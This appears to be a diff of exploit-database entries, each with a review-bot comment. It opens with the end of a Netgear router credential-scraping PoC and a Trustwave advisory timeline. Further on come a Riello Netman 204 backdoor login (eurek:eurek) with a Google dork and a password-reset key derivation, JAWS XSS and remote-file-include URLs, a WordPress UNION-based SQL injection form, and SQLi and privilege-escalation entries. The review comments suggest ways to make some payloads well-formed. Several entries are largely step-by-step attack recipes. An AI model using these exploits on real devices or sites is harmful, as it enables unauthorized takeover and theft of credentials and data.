sys.exit(0)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps:
Please see NETGEAR's KBA for list of firmware patches for various models. As a
workaround, the bug only works when password recovery is NOT set. If you do set
password recovery this is not exploitable.
Revision History:
04/06/2016 - Vulnerability disclosed to vendor
04/19/2016 - Request for update and received confirmation of receipt of the advisories
05/18/2016 - Request for update; no response
07/14/2016 - Request for update
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
10/17/2016 - Request for update
12/15/2016 - Notice of intent to publish advisories
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
01/30/2017 - Advisory published
References
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
2. https://www.exploit-db.com/exploits/32883/
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
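Review bot: `password.replace("&","&")` near the end of both scripts (the line after the `&#35;` replacement) is a no-op as written; the comment above it says the intent is to undo HTML entity encoding, so either it was `&amp;` to `&` and lost its entity in rendering, or it never decoded anything. Rather than hand-rolling one replacement per entity, decode the scraped value once with `HTMLParser().unescape()` (Python 2, which the `print "..."` statements target; `html.unescape` on Python 3), so a password containing `&lt;`, `&quot;` or numeric entities other than `#` is also recovered intact. Two more points in the same code: the bare `except:` around the first `requests.get(url)` treats every failure (connection refused, timeout, DNS) as "try HTTPS", and the HTTPS retry inside the handler is itself unguarded, so an unreachable host dies with a traceback instead of a message; in the second script the bare `except:` around the POST reports any transport error as "not vulnerable router", which is a false negative. Catch `requests.exceptions.SSLError` and `ConnectionError` explicitly. `model[13:-1]` assumes the `WWW-Authenticate` value is exactly `Basic realm="<model>"`; a regex on `realm="([^"]*)"` is safer across firmware builds. In the second script, the prose says the token check only fails on the very first request after a reboot and the script's own failure message says "reboot router and test again", so there is one attempt per reboot; the prose also says GET works and only "some models require you to send a post request", yet the script only ever sends POST. Please say why POST was chosen for all models, or note the tradeoff. In the version list, WNR1000v3 has two entries both marked "(Latest)"; one of them presumably should not be. Typos for the next revision: "Attcking" (both scripts) and "becuse" in the first script's failure message.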


@ -0,0 +1,45 @@
# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Reillo UPS
# CVE : N/A
Netman 204 cards have a backdoor account eurek:eurek.
This account can be logged with by simply browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet.
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581
Then browse to the url:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
Passwords have now been reset.
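Review bot: The recovery-key derivation is stated two different ways and they do not agree: the shell lines hash `.$NETMANID` through `echo`, so the input is `.204:<MAC>` followed by echo's trailing newline, while the prose says "do an MD5 hash of 204:[MAC ADDRESS]" with no leading dot and no newline. Those give different digests, so a reader who follows the prose with `printf '%s' '204:AA:BB:CC:DD:EE:FF' | md5sum` may not reproduce the `0354a655...` example; please state exactly which bytes are hashed and whether the MAC is upper- or lower-case (`ifconfig` prints it upper-case, and the digest changes with case). The `cut -c2-10` and the "characters 2-10, where position 1 is character 1" sentence do agree (nine characters, `354a65581`). Header metadata: "Vendor Homepage: blog.synack.co.uk" is the author's blog, the vendor is Riello (the Software Link domain), and "Reillo UPS" under Tested on is misspelt. Finally, "Due to flaws in parameter validation, the URL can be shortened to `username=eurek%20eurek`" asserts a parsing flaw without saying what was observed; a sentence on how the CGI splits that value would make the entry reproducible rather than a bare recipe.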


@ -8,5 +8,4 @@ This may facilitate the theft of cookie-based authentication credentials as well
JAWS versions 0.4 and 0.5 and subsequent are reportedly vulnerable.
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script
src=some script</script>
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script>
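Review bot: Joining the URL onto one line fixes the copy-paste break, but the payload it carries is still not a working reproduction: `<script src=some script</script>` never closes the opening tag with `>`, "some script" is not a URL, and the `<`, `>` and space characters need URL-encoding inside the `term` query parameter. Since the line is being touched anyway, a well-formed placeholder such as `term=%3Cscript%20src%3D[URL]%3E%3C/script%3E` would make the entry testable as written.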


@ -4,5 +4,4 @@ JAWS is prone to a remote file include vulnerability. This issue is due to a fai
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=
http://www.example.com
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com
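Review bot: The join is correct; the old split left `path=` empty on one line and the included URL on the next, which is exactly what gets pasted verbatim. One small improvement while here: `path=http://www.example.com` reads as if the include target were the example site itself, whereas the description says the attacker supplies the server-side script; a placeholder like `path=http://[attacker]/file.txt` would make clear which host serves the included code.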


@ -1,7 +1,6 @@
# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Title: WP Email Users 1.4.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
@ -11,7 +10,7 @@
1 - Description:
Type user access: is accessible for any registered user
Type user access: is accessible for any registered user
$_REQUEST[edit] is escaped wrong. Attack with Sql Injection
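Review bot: The description at the end of this hunk says `$_REQUEST[edit] is escaped wrong`, but the proof of concept in the next hunk injects through the `filetitle` POST field (with `action=weu_my_action` and `temp_sel_key=select_temp`) and never sends an `edit` parameter; one of the two names is wrong, and the description should name the parameter the form actually uses. The "Type user access" line appears as removed and re-added with identical text, which suggests a whitespace-only change; if that is all that changed, fine, otherwise the rendered diff is hiding the real edit.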
@ -24,15 +23,14 @@ http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wor
2 Using:
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="weu_my_action">
<input type="text" name="filetitle" value="0 UNION SELECT
CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
<input type="text" name="action" value="weu_my_action">
<input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/01/2016 Discovered
- 13/12/2016 Vendor not finded
12/01/2016 Discovered
13/12/2016 Vendor not finded
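Review bot: The timeline dates are ambiguous as written: `12/01/2016 Discovered` and `13/12/2016 Vendor not finded` read as 12 January and 13 December 2016 in day/month order, yet the blog post named in the hunk header is dated 2017/01/17, so "2016" in the first entry may be a typo for 2017; use one unambiguous format (YYYY-MM-DD) and change "finded" to "found". The reflow of the `<input>` lines is fine, but the form still posts to `http://localhost:8080/wp-admin/admin-ajax.php`, which only works when submitted from a browser holding a session for a registered user on that host (the description says the action is "accessible for any registered user"); say so next to the form. The payload `0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1` presumes the vulnerable query selects exactly one column; a sentence on what the response looks like when the injected `name:slug` comes back would tell a tester they have hit the bug.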

platforms/php/webapps/41204.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/video-sharing-script/
# Demo: http://video-sharing.itechscripts.com/
# Version: 4.94
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/channels.php?uid=[SQL]
# E.t.c
# # # # #
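Review bot: The only technical content is `channels.php?uid=[SQL]` followed by `E.t.c`, which does not tell a tester what kind of injection this is (error-based, union or blind), which other parameters "E.t.c" refers to, or what a positive result looks like. Please replace `[SQL]` with at least one concrete probe and its observable effect (for example a boolean pair such as `uid=1 AND 1=1` versus `uid=1 AND 1=2` returning different pages, or the database error text returned for `uid=1'`), and either name the additional parameters or drop "E.t.c". The author e-mail uses Turkish placeholders (`[beygir]` for @, `[nokta]` for the dot), which is fine but worth a note for non-Turkish readers.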


@ -0,0 +1,23 @@
# Exploit Title: Viscosity for Windows 1.6.7 Privilege Escalation
# Date: 31.01.2017
# Software Link: https://www.sparklabs.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
1. Description
It is possible to execute openvpn with custom dll as SYSTEM using ViscosityService because path is not correctly validated.
https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html
2. Proof of Concept
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41207.zip
3. Solution
Update to version 1.6.8
https://www.sparklabs.com/blog/viscosity-for-mac-windows-version-1-6-8/
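Review bot: The description says "path is not correctly validated" in ViscosityService but never says which path (the openvpn executable, the directory the DLL is loaded from, or a value taken from a user-supplied config) or how an unprivileged user supplies it, and the proof of concept is an external zip with no summary of what it does, so the entry is not self-contained if that link goes away. Add the attack steps in prose (what the service reads, from where, and what a low-privileged user controls) plus `# Version: 1.6.7` and `# Tested on:` header lines like the other entries; the Solution section should then state what 1.6.8 changed about the validation so readers can confirm the fix rather than only the version number.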